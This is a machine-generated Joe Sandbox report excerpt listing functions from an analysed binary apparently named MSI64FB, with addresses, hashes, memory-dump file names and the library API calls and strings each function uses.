                                                                                                                                                                                                                                                    • Instruction ID: 6b60aed5b79e040839921322a013639833e6c5a8ba16dda548f69f6fd0ef76a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b5d3277f4911141179525d391ca3b68cfba31e13b1b04252a50c7f0ab254f01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB11A1F1A5C242CAF799BF289552379B6E0EB09381FD08039C48EC7AD0DA3DE0908B10
                                                                                                                                                                                                                                                    Function 00007FF749F78CE8 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b4b8c9ab3e05c082a3753a4db46469dcbd39ec8e9c9cc20717fbe86670436863
                                                                                                                                                                                                                                                    • Instruction ID: 0b5e9aaff98eaa5fb7e49ffb8f1ceba14cc60fefab0736376e124680280edbb5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b8c9ab3e05c082a3753a4db46469dcbd39ec8e9c9cc20717fbe86670436863
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6A00121A0CA02E1E785BF84A890060A230AB61710BC02071E00D410E09E6CA9848220
                                                                                                                                                                                                                                                    Function 00007FF749F41210 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 310libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary$ErrorLast$AddressLoadLocalProc
                                                                                                                                                                                                                                                    • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                                                                                                    • API String ID: 541295828-1129428314
                                                                                                                                                                                                                                                    • Opcode ID: 90893dfa8f7085809678bfb929613cad971c142c9f422bfed67c6c3f7caf1b5a
                                                                                                                                                                                                                                                    • Instruction ID: d26b3671d4e3b87f3fed4146dc57ddbeeca34a4787169bbcd314fc7d0c8bd903
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90893dfa8f7085809678bfb929613cad971c142c9f422bfed67c6c3f7caf1b5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1ED16976B08B51CAEB10EF60E440AECB3B5FB24788F844535DE4E12A98EF38E555C760
                                                                                                                                                                                                                                                    Function 00007FF749F45240 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 356fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn$File$DeleteMoveNameTemp
                                                                                                                                                                                                                                                    • String ID: URL$url
                                                                                                                                                                                                                                                    • API String ID: 3276202954-346267919
                                                                                                                                                                                                                                                    • Opcode ID: 84e8fc73107c6b071d8778d98808e208780d956718d1f2a5d8bd4a8d3a411413
                                                                                                                                                                                                                                                    • Instruction ID: a1cab959853b5cf16c7cc47bc5419bd9ee5f465c50087e656e08ce736994aba1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84e8fc73107c6b071d8778d98808e208780d956718d1f2a5d8bd4a8d3a411413
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F1AC62F18B55C9FB00BFA4D8446AC6371FB54B98F905232DE5D27AE9DF78A584C300
                                                                                                                                                                                                                                                    Function 00007FF749F49EC0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 309COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                    • API String ID: 195334829-3019864461
                                                                                                                                                                                                                                                    • Opcode ID: fc103fa8d190d4e9f3f59991f74738a8d5f5289dc901af58efed2721ddbfdc34
                                                                                                                                                                                                                                                    • Instruction ID: 940420834f7461038c8e27425dabc5a335babe28a2d87a702458bd136faab4f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc103fa8d190d4e9f3f59991f74738a8d5f5289dc901af58efed2721ddbfdc34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE19F62F18B81C5FB14AF68D4047BCA3B1BBA4B98F805631DE6C266E5DF39E590C350
                                                                                                                                                                                                                                                    Function 00007FF749F870A4 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 411COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: 0$0$0$0$0
                                                                                                                                                                                                                                                    • API String ID: 3215553584-4235325143
                                                                                                                                                                                                                                                    • Opcode ID: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
                                                                                                                                                                                                                                                    • Instruction ID: 332157af02da3a74ecb35d90f87d810c975de49603aca3f151f016b4c807f95e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E1E43290DE86C5E791FE2A84503BDEBB1AB91B44FE48032DA9C577C2CF3DA4558321
                                                                                                                                                                                                                                                    Function 00007FF749FA0E00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: msi
                                                                                                                                                                                                                                                    • API String ID: 195334829-2402448040
                                                                                                                                                                                                                                                    • Opcode ID: a3ec3bcb67ca612cb4e6205c1f17b046e47c90cb8fa826a531b38a851e18886d
                                                                                                                                                                                                                                                    • Instruction ID: a26ddc10af53a9478bf2a0a1f7d2e7fb5a437b208011bb89edf6d36d8f0fed03
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3ec3bcb67ca612cb4e6205c1f17b046e47c90cb8fa826a531b38a851e18886d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE514860F1D683C4FF05BF69E889379E371AF99B80FD41932D94C166E4EE2CA5848324
                                                                                                                                                                                                                                                    Function 00007FF749F50A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 220memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$Free__std_exception_copy
                                                                                                                                                                                                                                                    • String ID: ios_base::failbit set$iostream
                                                                                                                                                                                                                                                    • API String ID: 448282989-302468714
                                                                                                                                                                                                                                                    • Opcode ID: 10b159b20428453308a30ed0b0ce3c9a021ea7a286194df649f518ca31c0e409
                                                                                                                                                                                                                                                    • Instruction ID: a93de4555de0d58a9ce9b1cdd65d47c356ac9d311a897c03fed9ff476c76b03b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b159b20428453308a30ed0b0ce3c9a021ea7a286194df649f518ca31c0e409
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F818F62A1CB81D5EB11BF24E4503B9A3B0FB957A4F955231EA9D02BD6EF3CE184C710
                                                                                                                                                                                                                                                    Function 00007FF749F42950 Relevance: 16.7, APIs: 11, Instructions: 207encryptionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Local_invalid_parameter_noinfo_noreturn$Cert$CertificateContext$#224NameString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2396941595-0
                                                                                                                                                                                                                                                    • Opcode ID: 4ef94e95634d936feb579ffd6878f6061d5ba6745a00a47ce77fce0d7c0361a2
                                                                                                                                                                                                                                                    • Instruction ID: 9c391436186c767d0fcabf2afb6daf9662db811306c48478a1ef0e578e8676f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef94e95634d936feb579ffd6878f6061d5ba6745a00a47ce77fce0d7c0361a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24919C22F18B82C6FB15AFA4E4443BCA371FB64B88F805535DE4D12BA5DF38E5958350
                                                                                                                                                                                                                                                    Function 00007FF749F450F0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal$Process_invalid_parameter_noinfo_noreturn$CloseCurrentErrorHandleLastOpenPathTempToken
                                                                                                                                                                                                                                                    • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                                                                                                                                                                                                    • API String ID: 457122396-595641723
                                                                                                                                                                                                                                                    • Opcode ID: bc088b1e1915e4bf3ae169a97baa2663a6e8cbc6b8afa9629ee6e2bf363453f5
                                                                                                                                                                                                                                                    • Instruction ID: c947f40aa57364c981c6c351414b11c7ce8b33895d5338af80cef109df528e26
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc088b1e1915e4bf3ae169a97baa2663a6e8cbc6b8afa9629ee6e2bf363453f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315E62A1CB81C6EB10BF59E45867EA370FB98B80F801636EA9D06B95DF3DE541C710
                                                                                                                                                                                                                                                    Function 00007FF749F464A0 Relevance: 15.1, APIs: 10, Instructions: 123timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1711917922-0
                                                                                                                                                                                                                                                    • Opcode ID: 3fed05e469d785b38db8d5c61c09361de6d0d3ac9770b5448cc22e197c7e1ea0
                                                                                                                                                                                                                                                    • Instruction ID: 521b3e3efac877517cfaac70d853d4a21a48fb73da0f6e86c831cc84d714323f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fed05e469d785b38db8d5c61c09361de6d0d3ac9770b5448cc22e197c7e1ea0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1515B36B48A11D5EB14FF61E9447B9B7B0AB14BA8F941234CE2E0ABC4DF3D9485C760
                                                                                                                                                                                                                                                    Function 00007FF749F5B3AC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF749F5B452
                                                                                                                                                                                                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF749F5B416
                                                                                                                                                                                                                                                    • :AM:am:PM:pm, xrefs: 00007FF749F5B462
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocwcsstd::_$Yarn
                                                                                                                                                                                                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                                                                                                    • API String ID: 1194159078-3743323925
                                                                                                                                                                                                                                                    • Opcode ID: b1724372f8d02e56061f6da248e3daa695b14287243a59dfa3dd38e2dd849955
                                                                                                                                                                                                                                                    • Instruction ID: 204b1be470ad968282f07b4b8a47379e13bf3b555acbd70d3eefb6fa8df3c11f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1724372f8d02e56061f6da248e3daa695b14287243a59dfa3dd38e2dd849955
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93214822A19B45C6EB10FF25E8413B9B3B0EB84B80F849235EA4D43B96DF3CE581C750
                                                                                                                                                                                                                                                    Function 00007FF749F7AC0C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                    • Opcode ID: 111225faaa9a5196aee9356e02acf4ffc1e47470c5b2bd150e5c4ecc94d4f646
                                                                                                                                                                                                                                                    • Instruction ID: b85fdc1ff825105224ef1e684f35cbd3623e85f930c6473e532cdf15e99d90e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 111225faaa9a5196aee9356e02acf4ffc1e47470c5b2bd150e5c4ecc94d4f646
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6D16866A1CB82CAEB20BF6594403ADB7B0FB45798F900175EE8D57B96DF38E091C710
                                                                                                                                                                                                                                                    Function 00007FF749F4C400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 157memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$LocalLockit$AllocFreeGetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 65438402-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: f5b3452e4bac8e9763551612ab9b5574fba039ae438485d91fec50c29855fb9f
                                                                                                                                                                                                                                                    • Instruction ID: 4666344328f6fb589795781f2dd7eece5603179d2a7fafc7790f217963d458cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5b3452e4bac8e9763551612ab9b5574fba039ae438485d91fec50c29855fb9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19719722B0AB41DAEB05FFA0D4402EDB3B5EB54748F845635DE4C27A95EF38E1A4C364
                                                                                                                                                                                                                                                    Function 00007FF749F8663C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
